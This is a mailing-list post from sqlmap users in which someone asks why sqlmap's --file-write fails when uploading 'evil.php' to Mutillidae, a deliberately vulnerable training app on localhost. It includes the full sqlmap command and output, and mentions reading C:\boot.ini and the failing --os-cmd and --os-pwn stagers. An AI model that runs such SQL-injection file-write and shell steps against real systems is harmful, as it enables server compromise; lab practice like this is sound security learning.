[sqlmap-users] File Writing
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] File Writing
|
From: Chris O. <chr...@gm...> - 2011-07-03 17:03:17
|
Hi I'm playing with file writing. I have a full privs root user set up in mysql and am using http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10to play with. I've set up a /temp folder below the web root of the app. I've put a file "evil.php" in the sqlmap working directory. I've also changed the permissions for all users on the temp folder to write access allowed. I'm using the following input to try and upload this file: C:\Program Files\sqlmap-0.9>python sqlmap.py -u " http://localhost/mutillidae/ind ex.php?page=user-info.php" --data "username=&password=&user-info-php-submit-butt on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" --file-wr ite "evil.php" --file-dest "temp/evil.php" This is with the latest dev build by the way. The output I get is: [18:00:03] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0 [18:00:03] [INFO] fingerprinting the back-end DBMS operating system [18:00:03] [INFO] the back-end DBMS operating system is Windows [18:00:04] [WARNING] if the problem persists with 'None' values please try to us e hidden switch --no-cast (fixing problems with some collation issues) do you want confirmation that the file 'temp/evil.php' has been successfully wri tten on the back-end DBMS file system? [Y/n] [18:00:12] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path [18:00:12] [WARNING] expect junk characters inside the file as a leftover from U NION query [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlm ap-0.9\output\localhost' [*] shutting down at 18:00:12 and sure enough the file isn't written. I've also tried using the --no-cast switch, to no avail. Does anyone have any ideas on what could be going wrong here? I can use the --file-read switch to read any file such as C:\boot.ini. The --os-cmd and --os-pwn commands also fail at the stager upload phase, probably for similar reasons. Any help would be appreciated Cheers Chris |
